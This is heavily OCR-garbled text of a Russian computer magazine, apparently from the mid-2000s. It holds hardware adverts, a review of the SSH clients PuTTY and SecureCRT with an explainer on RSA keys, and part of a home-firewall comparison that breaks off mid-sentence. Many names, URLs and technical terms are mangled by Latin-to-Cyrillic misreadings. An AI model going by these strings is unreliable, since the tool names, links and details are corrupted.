мой твоих знаний, а глупостью тех, кто тебя 
окружает. Удачи! ЗС 



тип третий, записи 

П9ТЕНТИФИКПЦИ0ННЫЕ 




АѴегТѴ Зіисііо 307 

просмотр и запись ТѴ и видео 
чипсет Рііііірз ВАА7134Н1. 
поддержка ІЧІСАІЧ стерео 
приём УКВ/РМ радиостанций 
русифицированный интерфейс 



АѴегТѴ Вох5 І_іѵе 

■ ТѴ на экране СКТ и І_СО мониторов 

■ поддержка РАЬ-О/К, ВЕСАМ-й/К 

■ гибкая настройка ТѴ каналов 
разрешение до 1024x768 75Гц 
русифицированное экранное меню 



СМОТРИ 

СЛУШАЙ 

ЗАПИСЫВАЙ! 



АѴегТѴ ЦЗВ 2.0 

I Просмотр ТѴ на экране 
персонального компьютера 
■ или ноутбука 
Приём эфирных и 
кабельных каналов ТѴ 
I Полноэкранный и оконный 
режимы работы 
Встроенные программные 
деинтерлейс фильтры 
Дополнительные входы для 
подключения внешних устройств 
Запись ТѴ и видео в формате 
йѴО, МРЕС1/2/4, ѴСй и АѴІ 
ТітеЗМ и работа по расписанию 
Подключение и питание 
по шине ІІЗВ 

Компактный эстетичный дизайн 
Русифицированный 
интерфейс пользователя 




. 748-7111 

антарес ѵѵѵѵѵѵ.апіагез.ги 









П опгое время протокол (еіпеі являлся своего рода стандартом для регистрации и выполнения команд на удаленном сервере. 

И это неудивительно! Благодаря чрезвычайно качественной реализации обработки подключений по К1 1, а также гибкости 
и расширяемости, протокол быстро завоевал популярность. Однако при всей привлекательности об его повсеместном применении 
в нынешнее время не может быть и речи. Виной тому стала нулевая безопасность. Полное отсутствие проверок на целостность сессии 
и передача данных в полностью открытом виде являются непозволительной роскошью. Особенно сейчас, когда любой начинающий 
компьютерщик знает о существовании снифера, а в интернете осуществляются крупные денежные транзакции. 




ОБЗОР 88Н-КПИЕНТ0В 







А И ЧТО ТЕПЕРЬ? 

И менно поэтому нет ничего 
удивительного в том, что 
пытливые умы планеты нача- 
ли искать замену незащи- 
щенному ІеІпеЕу и его бли- 
жайшим братьям-соратникам 
(гср, гіодіп, гзіі). Понятно, что 
помимо функциональности 
и практичности эта замена должна была 
отвечать самым жестким требованиям по 
безопасности. Думали долго. В итоге этой 
заменой стал набор утилит 88Н, который как 
ничто иное изящно обеспечивал конфиден- 
циальность передаваемых данных даже 




по незащищенным каналам связи. В нем, 
наконец-таки, была реализована криптогра- 
фическая аутентификация «на лету» и полно- 
ценное шифрование удаленных соединений. 

Все бы было замечательно, если бы не 
одно «но». После появления второй версии 
протокола разрабатывающая его компания 
«88Н Соттипісайопз Зесигйу Оу» объявила о 
переводе проекта на коммерческие рельсы. 
Использование нового защищенного команд- 
ного интерпретатора без покупки лицензии 
стало возможным исключительно в образова- 
тельных целях или для персонального ис- 
пользования. Разумеется, это не могло пон- 
равиться тем, кто занимался активным внед- 
рением продвинутого во всех отношениях 
протокола в новейшие операционные систе- 
мы. Прежде всего, в системы ореп зоигсе. 
Итак, в 2000 году ребята из команды 
ОрепВЗО выпустили свою собственную реа- 
лизацию 88Н - Ореп88Н. И это было отнюдь 
не уродливое подобие оригинального 8есиге 
ЗІіеІІ. Нет! Ореп88Н не только не проигры- 
вал, но и во многом составлял серьезную 
конкуренцию своему прародителю. Главными 
козырями бесплатной разработки являлись: 
а способность производить аутентифика- 
цию пользователей с помощью алгоритмов 
В8А и 08А, основывающихся на применении 



двух криптографических ключей (приватного 
и публичного); 

л поддержка специальных алгоритмов 
шифрования (ОЕ8, ЗЭЕ8, ВІоѵѵйзІі для пер- 
вой версии протокола и АЕ8-128, АЕ8-192, 
АЕ8-256, ВІоѵѵйзІі, СА8Т-128 для второй); 

л защита от ІР-, ОИЗ- и других видов спу- 
финга; 

а обеспечение контроля целостности се- 
анса связи с помощью СВС32 в протоколе 
88Н1 и НМАС-8НА1/НМАС-ІѴЮ5/НМАС- 
ВІРЕІѴЮ в 88Н2; 

а возможность создания зашифрованных 
туннелей с использованием технологии 
«ТСР-ІР Топл/агсііпд»; 

а автоматическая компрессия передавае- 
мых данных, в том числе и сеансов по про- 
токолу X1 1 . 

Разумеется, эта интерпретация коммер- 
ческого ЗЗН не могла остаться незамечен- 
ной. И не осталась! Самое достоверное до- 
казательство тому - ее повсеместное ис- 
пользование. ОрепЗЗН, за редким исключе- 
нием, установлена практически на всех *піх- 
системах. И вероятнее всего, работать ты 
будешь именно с ней. Для этого, правда, 
придется определиться с выбором ЗЗН-кли- 
ента. Но это не беда - помогу, чем смогу. 






Л ПОИСК КЛИЕНТОВ 



РиТТУ 0.54 



Размер: 364 КЬ 



Тип: Ргееѵѵаге 

Ссылка: иѵѵпѵ.сІііагк.дгеепеп(1.огд.ик/~здіаіІіат/риНу 



Едва ли найдется юзер, который никогда 
не слышал о таком ЗЗН -клиенте, как РиТТУ. 
Эта крохотная утилита размером чуть мень- 
ше четырехсот килобайт завоевала сердца 
пользователей по всему миру. И, знаешь ли, 
этому есть причины! Тот факт, что прога 
предназначена для масштабных мероприя- 
тий, становится очевидным сразу после ее 
запуска. Именно тогда перед глазами поль- 
зователя появляется окно настроек програм- 
мы, поражающее обилием опций, парамет- 
ров и установок. Возможно, кому-то даже 
покажется, что их количество чрезмерно. Но 
это не так. Все специфические опции по 
умолчанию имеют вполне оптимальные зна- 
чения. А это значит, что в самом простом 
случае все можно оставить по дефолту. Воз- 
можно даже, что ты никогда не узнаешь о 
назначении некоторых опций. Зато более ис- 
кушенные и опытные товарищи, адаптируя 
программу под себя, наверняка найдут этим 
настройкам достойное применение. Тем бо- 
лее что ориентироваться среди них - не 
проблема, т.к. все они тщательно рассорти- 
рованы по разделам. 







Окно настроек РиТТУ. Глаза 
разбегаются, честное слово 



Перечислять все поддерживаемые РиТТУ 
функции было бы глупо. На это, пожалуй, не 
хватит и целой статьи. Поэтому упомяну лишь 
наиболее вкусные из них. Начнем с того, что 
РиТТУ - это не только ЗЗН-клиент. Помимо 
обеих версий ЗЗН-протокола, программа 
поддерживает и ряд других: Теіпеі, ВІодіп, 
Ваѵѵ. При этом для каждого из них можно 
подключить функцию «АиЫодіп изегпате», 
сохраняющую имя используемой тобою учет- 
ной записи для последующих сессий. Если 
эта опция активна, то во время следующего 
подключения к серверу вводить логин вруч- 
ную уже не придется. РиТТУ сделает это за 
тебя. Однако пароль все-таки нужно будет 
ввести самому, т.к. его клиент не сохраняет. 



В8П. ПРИНЦИП РОБОТЫ 



К риптографические системы бывают разные. Их история раз- 
вития видала немало различных алгоритмов шифровки, 
взломать которые порой бывало очень и очень непросто. Пер- 
воначально широкое распространение получили криптосисте- 
мы, которые использовали для кодирования и декодирования 
информации специальный секретный ключ. Их эффективность 
была на высоте, т.к. расшифровать закриптованное таким об- 
разом сообщение без кодового слова было практически невоз- 
можно. Однако у этих систем был единственный, но зато край- 
не серьезный недостаток - необходимость передавать этот са- 
мый ключ по зашифрованным каналам. Обойти это ограниче- 
ние стало под силу только совершенно новым криптографичес- 
ким системам, появившимся в середине 70-х годов 20-го века. 
В них применялись алгоритмы, основанные на теории исполь- 
зования не одного, а сразу двух ключей - открытого (риЫіс кеу) 
и приватного (зесгеі: кеу). 

Типичным представителем этих криптосистем стал В5А. Прин- 
цип передачи сообщения с его помощью довольно прост. Рас- 
смотрю его на примере. Предположим, что Сиііег захотел в сек- 
рете от всех остальных коллег передать сообщение Бублику. 
Задача, как видишь, тривиальна. От главреда в этом случае пот- 
ребуется с помощью открытого ключа Бублика зашифровать 
послание и отправить его в таком виде получателю. Бублику же, 
в свою очередь, невероятно обрадовавшемуся оказанному к 
своей персоне вниманию, для декодирования шифровки при- 
дется воспользоваться своим приватным (хранимым им с осо- 
бой осторожностью) ключом. Лишь после этого он сможет про- 
читать сообщение. 

Немаловажно, что оба Н5А-ключа создаются по специальному 
алгоритму и напрямую зависят друг от друга. Однако восстано- 
вить один из них, имея в наличии другой, не представляется 
возможным. Во многом это достигается за счет наличия быст- 
рых алгоритмов, способных генерировать большие простые 
числа, и в то же время из-за отсутствия возможности за корот- 
кий срок разложить два таких числа на множители. 






Принципиально. Как гово- 
рится, из соображений 
безопасности. 

Частенько попадаются 
серверы, которые по дос- 
тижении какого-то опре- 
деленного промежутка 
времени закрывают неак- 
тивные сессии. Т.е. если 
ты, подключившись к уда- 
ленной машине, долгое 
время не будешь подавать 
признаков жизни, то сер- 
вер сочтет тебя отключив- 
шимся и закроет соедине- 
ние. «Соппесііоп гезеі Ьу 
реег» будет последним, что ты увидишь. Что- 
бы избежать подобных дисконнектов, в РиТТУ 
встроена специальная функция «ІІзіпд 
кеераііѵез іо ргеѵепі сіізсоппесііоп». Если ее 
активизировать, то клиент начнет регулярно 
посылать на сервер некоторые данные, эму- 
лируя твои присутствие и активность. 

Примечателен тот факт, что визуальная 
часть работы с сервером целиком и пол- 
ностью конфигурируема: подобрать под свой 
вкус можно практически все, начиная типом 
курсора и шрифта и заканчивая определени- 
ем АМЗІ-цветов. Но заниматься этим вовсе 
не обязательно, т.к. РиТТУ по умолчанию 
имеет несколько вполне симпатичных цвето- 
вых схем, способных удовлетворить пыл да- 
же самых привередливых пользователей. 

Разумеется, есть у программы и минусы. 
Вернее, если быть точным, всего один ми- 
нус - отсутствие поддержки одновременного 
открытия нескольких сессий. Говоря проще, 
для параллельной работы с несколькими 
серверами тебе придется открывать нес- 
колько экземпляров программы. А это, на 
мой взгляд, не очень-то удобно. 

Подключиться к серверу с помощью 
РиТТУ крайне просто. Как говорилось ранее, 
с запуском программы открывается компакт- 
ное окно настроек утилиты. Первая его 
вкладка - это именно то, что нам нужно. В 
поле «Нозі Мате» вбиваем имя или адрес 
сервака, указываем используемый протокол 
и нежно жмем на кнопку «Ореп». Пара воп- 
росов по поводу подтверждения доверия 
ВЗА-ключам и... мы на сервере! 




Здесь ты можешь 
совершенно бесп- 
латно заиметь 
шелл: 

а шл/ѵ.суЬег- 
зрасе.огд - 1 Мб, 
Іупх, ііпдег, ѵѵііоіз 
л ѵгаѵѵЛгеезІіеІІ.огд 

- 20 Мб, домашняя 
страница, егпаіі, 
ряд сервисов: ісц, 
ЬЬоагсІ датез, 
ТОР5-20, тисі, 
дорИег. После ве- 
рификации еще и 
еіт, ріпе, таііх, 
гтаіі, Іупх, сді, 
Ьазіі, кзИ, ІсзИ, гс, 

23І1, ІСІ5І1. 

л ѵгаѵѵ.гооізІіеІІ.Ье 

- 5 Мб, $$Н, пол- 
ный перечень стан- 
дартных утилит. 



а На нашем диске 
ты найдешь пол- 
ные версии прог- 
рамм, описанных в 
этой статье. 




^іІП^^омёкПіодключ^^ 
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л Судя по статис- 
тике, дырки в 
ОрепЗЗН - далеко 
не редкость. Так 
что если держишь 
в процессах 55Н- 
демон, то поза- 
боться о своевре- 
менной установке 
свежих баг-фиксов. 




а Математическое 
описание крипто- 
системы В5А: 
ііИр://тетЬег$. 
ІгіросІ.сот/ігізИ_ 
гопап/гза 
л Огромный РАО 
по $$Н: 

ІіИр://Ііпих.регт.ги 
/сІос/пеі/ззЬ/ 
55И_Тац.ИІтІ 
л Быстрый тур по 
установке и наст- 
ройке $$Н: 
ІіПр://Ьаг(іак.ЫоосІ 
.ги/ѵіюгк/ІгееЬзсі/ 
ззИ-іпзІаІІ.ИІш 
А Что такое 55Н: 
/іИр://іпр.п$к.зи/~Ь 
оІкИоѵ/ІеасИ/іприпі 
х/зес_ззІі.ги.Іі(тІ 



Стоит заметить, что на этапе подключения 
можно сохранять параметры сессии, чтобы в 
следующий раз избежать повторного ввода 
адреса сервера, выбрав из списка нужное 
соединение. Разработчики позаботились, 
кстати, и о тех, кто любит оставаться инког- 
нито. Им сам Бог велел подключить к делу 
проверенную проксю в разделе настроек 
«Соппесйоп». 




Если по каким-то причинам тебе не под- 
ходит РиТТѴ, то определенно стоит попробо- 
вать этот воистину замечательный, хотя и 
шароварный клиент. Поверь мне, эта софти- 
на умеет все! И даже еще чуть-чуть :). Дос- 
таточно взглянуть на пресс-релиз програм- 
мы, и все сразу становится ясным. В 
ЗесигеСВТ поддерживается целая куча про- 
токолов (ЗЗН1/2, Іеіпеі, гіодіп, зегіаі), нес- 
колько типов авторизации пользователя на 
сервере (РаззѵѵогсІ, РиЫіс Кеу, ОЗЗАРІ) и 
шифрование данных по ряду совершенно 
разных алгоритмов (АЕЗ, ТѵѵоТізМ, Віоѵѵіізіі, 
ЗБЕЗ, ВС4, ОЕЗ). Только вот за это разра- 
ботчикам нужно заплатить пошлину :). Пого- 
ди, еще рано визжать от восторга! К этому 
списку можно смело добавить целый пере- 
чень дополнительных и, что немаловажно, 
уникальных фишек. Но обо всем по порядку. 

Несмотря на невероятную функциональ- 
ность софтины, она никоим образом не сма- 
хивает на малопонятный, перегруженный 
настройками, неудобный в использовании 
пакет. Отнюдь нет! Поначалу всех этих наво- 
ротов даже не замечаешь. Все кажется пре- 
дельно простым и понятным. На старте поль- 
зователя приветствует вполне обычное окош- 
ко «Оиіск Соппесі», предлагающее устано- 
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вить соединение с серве- 
ром. Что касается главного 
окна программы, то и оно 
«блещет оригиналь- 
ностью»: банальные меню, 
тулбар и рабочая область 
программы. Однако стоит 
немного углубиться в наст- 
ройки проги, как начина- 
ешь ловить себя на мысли, 
что разработчики учли аб- 
солютно все. В отличие от 
РиТТѴ, где настройки программы являются по 
большей части глобальными и распространя- 
ются на все подключения сразу, здесь боль- 
шинство опций и параметров можно устано- 
вить отдельно для каждого конкретного подк- 
лючения. При этом сессии количеством наст- 
роек разработчики не обделили - их тьма. 
Затрону только наиболее интересные из них. 

«Ьодоп Зсгіріз» - настройка скрипта, 
выполняемого сразу же после удачного сое- 
динения с сервером. Изначально предназна- 
чалась для обеспечения автоматического 
ввода имени пользователя и пароля. Сейчас 
же, благодаря поддержке сценариев, стало 
реальным осуществление не только автома- 
тического входа в систему, но и выполнение 
любых рутинных действий на сервере. Глав- 
ное -грамотно написать сценарий, а для это- 
го нужно знать хотя бы один из трех поддер- 
живаемых языков программирования 
(ѴВЗсгірІ, ^сгірі, РегІ). 

«$$Н2» - выбор алгоритма шифрования 
и управление сжатием передаваемых дан- 
ных. Эффективность напрямую зависит от 
параметра «Сотргеззіоп І_еѵеІ», который 
варьируется в пределах от 0 (минимум сжа- 
тия) до 9 (максимум компрессии). 

«Рогі Рогѵѵагсііпд» - очень полезный 
инструмент, позволяющий зашифровать 
часть ТСР/ІР-трафика и пустить его по защи- 
щенному ЗЗН -протоколу. На практике это 
можно использовать, например, для обеспе- 
чения конфиденциальности переписки. При 
этом шаманить с бубном вокруг любимого 
ТГіе Ваі! не стоит. Куда лучше обратиться к 
справке ЗесигеСПТ, содержащей подробный 
мануал по настройки этой фичи. 



«Арреагапсе» - настройки внешнего ви- 
да терминала, ни в чем не уступающие ПуТ- 
ТИнским (и Ельцинским - прим. ред.). 

Трудностей и проблем при соединении с 
сервером, опять же, возникнуть не должно. 
Осуществить подключение можно двумя пу- 
тями: через появляющееся на старте прог- 
раммы окошко «Оиіск соппесі» либо через 
окно управления подключениями (самая ле- 
вая кнопка в тулбаре). Так или иначе, но не- 
обходимо выбрать используемый протокол, 
указать имя или ІР-адрес сервака, а также 
заполнить поле «Мате». Стандартные значе- 
ния метода первичной и вторичной аутенти- 
фикации подойдут в большинстве случаев, 
а работу прокси можно наладить в разделе 
«РігеѵѵаІІ» глобальных настроек программы 
(меню Орііопз -> СІоЬаІ Орііопз). 

Л И ВСЕ? 

Да, все! Не стоит обвинять меня в предвзя- 
тости, но я намеренно не стал описывать ка- 
кие-либо экзотические варианты. Оказалось, 
что это совсем ни к чему. Ни один из других 
протестированных мною ЗЗН-клиентов не 
смог выделиться среди серой массы, показать 
уникальные и зацепившие меня функции. Да и 
до безукоризненной стабильности ЗесигеСПТ 
и РиТТѴ многим из них еще далеко. Жаль, ко- 
нечно, что описанные в обзоре софтины явля- 
ются стандартом, но с другой стороны: что 
еще можно потребовать от ЗЗН-клиента? Ви- 
димо, разработчики учли и предусмотрели 
все, что только может понадобиться. При 
этом выделить среди этих двух клиентов луч- 
ший - задача непростая. Каждый решает ее 
сам, исходя из своих собственных предпочте- 
ний. И тебе того же желаю. Действуй! 
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Сделай то, 
о чем раньше 
не мечтал 




С высокопроизводительной рабочей станцией 

К-81у1е® СагЬоп® Аі 521 



За разумные деньги в составе К-81у1е® СагЬоп® Аі 521 



на базе процессора Іпіеі® Репііиш® 4 3.40 ГГц 
с технологией Нурег-Т1ггеаёіп§ , 

ты сможешь то, о чем раньше не мог и мечтать - 
стать режиссером, дизайнером или космическим 
путешественником. 



• процессоры Іпіеі® Репііиш® 4 с технологией НТ 
с частотой до 3,40 ГГц 

• двухканальная оперативная память ББВДОО 

• высокопроизводительные графические адаптеры 
с интерфейсом АСР Рго 

• жесткие диски Зегіаі АТА (есть возможность организации 
КАЮ 0,1) сделают то, что раньше тебе не было доступно. 



Система качества проектирования, разработки и производства компании 
К-5іу1е Сотриіегз® сертифицирована по международному стандарту 150 9001-2000. 


На компьютеры К-5іу1е® СагЬоп® устанавливается лицензионная 
операционная система МісгозоЙ®Ч)СіпсІо\У5®. 


Астрахань ТАН (8512) 394-254 Братск Байт (395-3) 411-121 Владивосток ЭР-Стайл ДВ (4232) 
205-410 Воронеж Элмар Трейд (0732) 512-018 Калининград Балтик Стайл (011) 254-11-98 
Кемерово Конкорд ПРО (3842) 357-888 Кострома ИТ-Профессионал (0942) 626-903 
Краснодар ВСС Сотрапу (8612) 640-450 Красноярск ЛанСервис (3912) 239-342 Москва К- 
Зіуіе ТгасНп§ (095) 514-14-14, Компания К-5іу1е (095) 514-14-10, Профит-М (095) 748-02-72, 
Прайм Труп (095) 725-4432/33, Сибкон (095) 292-50-12 Экселент (095) 955-13-26 Нижний 
Новгород ЭР-Стайл Волга (8312) 443-517 Новосибирск ЭР-Стайл Сибирь (383-2) 661-167 
Пенза ЭЛСИ (841-2) 544-141 Пермь ЭР-Стайл Кама (3422) 107-445 Петрозаводск Илвес (8142) 
762-288 Петропавловск-Камчатский АМН (4152) 168-751 Ростов-на-Дону ЭР-Стайл Дон 
(8632) 524-813 Санкт-Петербург ЭР-Стайл СПБ (812) 329-36-86 Тамбов Аксиома (0752) 759-370, 
Гитон (0752) 719-754 Тула ПитерСофт-НТ (0872) 355-500 Уфа Альбея-Техпроект (3472) 289-212, 
Онлайн (3472) 248-228 Хабаровск ЭР-Стайл ДВ регион (4212) 314-530 


■ К* 8іу1е 

СОМРІІТЕП5 

Техническая поддержка: К-Зіуіе Сотриіегз (095) 514-1417 
\ѵ\ѵ\ѵ.г-8Іу1е-сотриІег8.ги 

Сделано в России. Сделано на совесть! 



Іпіеі, Іпіеі 1о§о, Іпіеі Іпзісіе, Іпіеі Іпзісіе 1о§о, Іпіеі Сепігіпо, Іпіеі Сепігіпо 1о§о, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗіер, Ііапіиш, Репііиш, апсі Репііиш III Хеоп аге ігасіешагкз ог ге§ізіегесі ігасіетагкз о! Іпіеі 
Согрогаііоп ог Из зиЬзісІіагіез іп іЬе ІІпііесІ Зіаіез апсі оіНег соипігіез. 
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■ ложно поспорить с тен, что файрвол - это вещь исключительно полезная. Он как презерватив, который всегда нужно носить с собой. 
Стоит разок забыть об этом средстве контрацепции, и минута экстаза обернется уютно поселившейся в твоем организме заразой 
или другой известной, но трудноразрешимой проблемой. С файрволом все аналогично. Если забьешь на его использование, то будь 
уверен, что через день же подцепишь пару червей, почувствуешь на себе все прелести массового сканирования портов и непонятной 
утечки трафика. Что, не нравятся такие перспективы? То-то же, давно пора заняться выбором правильного файрвола. 



ТЕСТ-ОРОЙВ СПИЫК ПОПУЛЯРНЫХ ГІНЕШІ'ОВ 



А КТО ЕСТЬ КТО? 

Ф айрволов сейчас разве- 
лось море. Одни удачные, 
другие не очень. Бывает, 
попадаются и такие файр- 
волы, которые скорее 
представляют собой серь- 
езную дыру в безопаснос- 
ти, нежели обеспечивают 
ее. Для этого обзора я выбрал 4 наиболее 
популярных и вместе с тем полнофункцио- 
нальных межсетевых монитора, реально спо- 
собных оградить стеной твою домашнюю 
машину. Каждый из них удачно справляется 
со следующими задачами: 

О. закрытие всех неиспользуемых портов; 
О. обнаружение сканирования портов; 

®. предотвращение атак извне; 

О. настройка правил файрвола и ограни- 
чение доступа приложений в интернет; 

Ѳ. обнаружение троянов и прочих зараз, 
маскирующихся под доверенные приложения; 
Ѳ. «стелс-режим». 

А Р03Б0Р ПОЛЕТОВ 
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С этим файрволом я познакомился пару 
лет назад. Тогда это была простенькая тулза, 
имеющая попсовый интерфейс, узкий круг 
поддерживаемых функций и целую кучу раз- 
личных глюков на борту. С того времени 
2опеАІагт заметно набрал вес, обзавелся 
клеймом «РгоТеззіопаІ» и получил кучу наград 
от престижных софтверных ресурсов и журна- 
лов. А по заверению многих пользователей, 
он вообще стал чуть ли не лучшим брандмау- 
эром в мире :). Ну что ж, посмотрим. 

Начну, пожалуй, с установки. И совсем не 
потому, что она требует пошагового объяс- 
нения и разжевывания каждой детали. Сов- 
сем нет! Все действия предельно просты, и 
трудности с ними могут возникнуть разве 
что у грудастой секретарши. Зато проблемы 
со стабильностью у ЗонАлярма есть :(. По- 
виснуть установка может запросто. Так, со- 
вершив две попытки установить софтину на 
своей домашней машине, я оба раза лицез- 
рел окошко «Сопйдигайоп 2опеА1агт», не по- 
дающее никаких признаков жизни. 

Однако, как бы это ни было удивительно, 
даже с некорректно завершенной установкой 
программа все-таки заработала. Во время 
первого запуска, как и полагается любой по- 
добной софтине, пользователя радужно приве- 
тствует мастер, который предлагает пошама- 



нить над некоторыми настройками программы. 
Так сказать, не отходя от кассы. Но раньше 
времени радоваться этой приветливости не 
стоит. Дело в том, что толку от этого ѵѵіпгасГа 
так же мало, как и от предлагаемых настроек. 
Более или менее значима, пожалуй, только од- 
на - та, что отвечает за определение твоего 
вмешательства в процессе настройки правил 
выхода в сеть. 2опеАІагт со знанием дела 
предлагает полностью взять эту задачу на се- 
бя, но лично мне эта идея сразу не понрави- 
лась. Файрвол, помимо моих специфических, 
зачастую самописных прог, не распознал даже 




некоторых распространенных грандов. Какая 
здесь может идти речь об автоматике? 

Но если не обращать внимания на эту из- 
лишнюю «скромность», то настройка правил 






защити СВОЙ ИНЕТ-ТРПФИК 




Раскеі Тіііег 



файрвола проходит на «раз-два». Как только 
какое-то приложение, не прописанное в пра- 
вилах, начнет ломиться в инет, ІопеАІагт тут 
же поднимет тревогу. С помощью окошка, 
всплывающего в районе трея, доступ наружу 
этому приложению можно разрешить, а мож- 
но и запретить. Если потребуется обозначить 
более изысканное правило, то расширенные 
настройки будут как никогда кстати. С их по- 
мощью ты сможешь четко указать, откуда и 
куда (ІР-адреса), по какому протоколу и пор- 
ту будет иметь доступ та или иная програм- 
ма. Тут уж враг точно не пройдет. 

Разумеется, это далеко не все, чем может 
похвастаться ІопеАІагт. Есть еще немало вкус- 
ных добавок и интересных фишек. К примеру, 
функция «МаіІзаТе» способна автоматически 
блокировать вирусонапоминающие ситуации. 
Ими она считает фальсификацию е-таіі адреса 
и одновременную отправку письма более чем 
50 (стандартное значение) адресатам. Она же 
готова скрупулезно переименовывать все прик- 
репленные к письмам аттачи, чтобы твои ша- 
ловливые ручонки не запускали их в самый не- 
подходящий момент. А встроенный блокиратор 
рекламы, хотя и не без глюков, добросовестно 
режет баннеры и назойливые рор-ир'ы. 

Разумеется, все попытки совершения 
атак тщательно логируются. Отчеты, кстати, 
становятся более читабельными благодаря 
функции визуального отображения местона- 
хождения неприятеля. Это, пожалуй, понра- 
вится каждому. 

Радует и то, что конфигурацию 
ІопеАІагт'а можно бэкапить. Например, 
для последующего восстановления. Или еще 
лучше - распространения. Неоценимое подс- 
порье, если требуется настроить брандмауэр 
на нескольких машинах сразу. 

Вердикт: отличный, почти идеальный 
файрвол, способный удовлетворить любые, 



даже самые извращенные потребности 
пользователя. 



Экспонат: Кегіо РегзопаІ РігеѵѵаІІ 4.0.16 




Размер: 5,59 Мб (XI.) 


л 




Тип: ЗІіагеѵѵаге 


Хомяк: ѵѵѵѵѵѵ.кегіо.сот 





лярность не из-за невиданной функциональ- 
ности, а за счет своей простоты. Настройка 
безопасности системы осуществляется с по- 
мощью 4-х его разделов, каждый из которых 
специфичен. 

Первым в списке значится самый важный 
раздел «Безопасность в сети», который, 
собственно, определяет правила файрвола. 
Именно здесь указывается, какие приложе- 
ния имеют доступ в инет, какие в локальную 
сеть, а у каких имеются неограниченные 
привилегии. Причем системные приложения 
по дефолту настроены на работу исключи- 
тельно в локалке, и доступ в интернет им 
перекрыт. Но наладить их работу в глобаль- 
ной Сети - сущий пустяк. Так, если оцени- 
вать юзабилити (ого, какое слово - прим, 
ред.) системы настройки правил файрвола, 
то Кегіо РегзопаІ РігеѵѵаІІ заслуживает твер- 
дой «пятерки». Поставленная задача выпол- 
няется всего за несколько секунд установкой 
в нужных местах галочек и крестиков. Осоз- 
нать на слух это довольно сложно, поэтому 
будет гораздо лучше, если ты взглянешь на 
скриншот. Видишь кнопочку «РаскеТ Шег»? 
Кликнув по ней, указав ІР-адреса отправите- 
ля и получателя пакетов, используемый порт 
и другую системную информацию, сможешь 
определить правила файрвола на уровне 
протокола. Разработчики не учли, пожалуй, 
только вариант с использованием того или 
иного правила, зависящего от времени су- 
ток. Но это пригодилось бы лишь дотошным 
гурманам. 



Раздел «Безопасность системы» никакого 
отношения к интернету не имеет. Тем не ме- 
нее, язык не поворачивается назвать его 
бесполезным. Он нужен для того, чтобы сле- 
дить за программами, используемыми на 
твоем компьютере локально. Проще говоря, 
он предотвращает запуск (в том числе и не- 
санкционированный) всякой дряни (вирусов, 
троянов и руткитов). В случае опасности 
Кегіо РігеѵѵаІІ тут же забьет тревогу и сооб- 
щит о своих подозрениях. Не остаются неза- 
меченными и изменения бинарников. Но 
именно эту часть защиты нельзя назвать 
полноценной, потому как за используемыми 
ОИ'ками никакого наблюдения не ведется. 

Третий раздел носит броское название 
«Система обнаружения вторжений». Приз- 
наться, у меня эта часть программы вызыва- 
ет непроизвольную улыбку. Черт подери, 
насколько эффективной может быть эта сис- 
тема, если она имеет всего пару-тройку 
настроек? Да и те управляют лишь степенью 
защищенности. Возможно, она и спасет от 
йоЗ-атаки, но не более того. Этим сейчас 
мало кого удивишь. Любой другой файрвол 
способен на такое же. 

Последний раздел Кегіо РігеѵѵаІГа пред- 
назначен для настройки веб-безопасности. 
Здесь предлагается блокировать АсйѵеХ- 
компоненты, ѴізиаІ Вазіс и ^ѵа-апплеты, 
фильтровать кукисы и - внимание! - блоки- 
ровать утечку конфиденциальной информа- 
ции. Мне так и не удалось выяснить, что под 
этим подразумевается :). А я старался! Отп- 





Другие файрволы: 

А Ьоок п'ЗЩр: 

ѵѵѵѵѵѵ.іоокпзіор.сот 

а МсАІее Эезкіор: 

ѵѵѵт.паі.сот/из/ 

ргосіисіз/тсаіее/ 

Іюзі_ірз/сІе5Иор_Лг 

еѵѵаІШт 

а Зудаіе: 

ІіИр://зтЬ.зудаіе. 

сот/ргосІисІз/рзрѴ 

рзрТ_оѵ.Мт 

а Тіпу: 

ѵѵѵѵѵѵДіпузоЛѵѵаге. 

сот 

8зідпз РігеѵѵаІІ: 

ѵѵѵш.сопзеаШге- 

ѵѵаІІ.сот 




а Тест-драйв сов- 
ременных файрво- 
лов по специфи- 
ческой методике: 
ѵѵѵѵѵѵ.ІігеѵѵаІІІеак- 
Іезіег.сот/іезіз.Мт 
Здесь можно про- 
вести опііпе-тест 
твоего брандмауэра: 
ѵѵѵѵѵѵ.рсІІапк.сот/ 
зсаппег1.Мт?Ігот 
=тепи 
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равлял кучу паролей от системы на резерв- 
ный почтовый ящик, набирал их в строке по- 
иска Гугла. И что ты думаешь? Ничего не 
заблокировалось. А ведь обещали золотые 
горы, политики хреновы! 

Не впечатляет и встроенный резак рекла- 
мы. Зашел, интереса ради, на несколько сай- 
тов. Результат: чуть ли не половина баннеров 
осталась на своих местах. Аналогично дело 
обстояло и с рор-ир'ами. Печальное зрелище. 



Вердикт: добротный файрвол, но над 
его дополнительными функциями разработ- 
чикам еще предстоит немало поработать. 
Сейчас же это неплохой вариант для тех, кто 
особо не гонится за функциональностью. 




л На нашем диске 
ты найдешь пол- 
ные версии прог- 
рамм, описанных в 
этой статье. 



Говорят, что гостя встречают по одежке. 
Не знаю, верно ли это. По крайней мере, с 
Адпійлті ОиТрозТ РігеѵѵаІГом все получилось 
именно так. Прочитав когда-то заманчивое 
описание на официальном сайте, я чуть не 
побежал за детским слюнявчиком - так силь- 
но захотелось быстрее скормить линк люби- 
мой качалке. Признаться, с тех пор с 
ОиТрозТ'ом я не расстаюсь, потому что это 
очень добротно слепленная софтина. 

Радовать она начинает с самого начала. 

А именно с момента установки, когда функ- 
ция «АіЛотайс СопТідигаЛоп» любезно пред- 
лагает пользователю свой собственный вари- 
ант начальных правил файрвола. Принцип их 
создания ничем особенным не выделяется: 
сначала брандмауэр кропотливо изучает ус- 
тановленные в системе приложения, затем 
ищет соответствия в своей базе и выводит 
конечный результат. Но в этой цепочке при- 
сутствует одно очень сильное звено - база 
данных программ. Складывается такое впе- 
чатление, что ОіЛрозТ знает все (ну или прак- 
тически все) настолько хорошо, что распоз- 
нает все приложения. 

А если даже какая-нибудь экзотическая 
утилита и останется незамеченной - не беда. 
Для нее ты сможешь установить правило 
вручную, например во время первой же по- 
пытки ее доступа в сеть. В этом файрволе 
имеется целый ряд обобщенных правил для 
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Настройка правил в Аутпосте 




разного типа программ: браузеров, Йр-кли- 
ентов и т.д. 

Не особо сложно обозначить и координа- 
ты внутренней сети, потому как для этих це- 
лей также имеется специальный мастер. 
Единственное, что он от тебя потребует - в 
нужный момент нажать кнопку «ОеТесТ». Вуа- 
ля! И настройки со всех сетевых интерфей- 
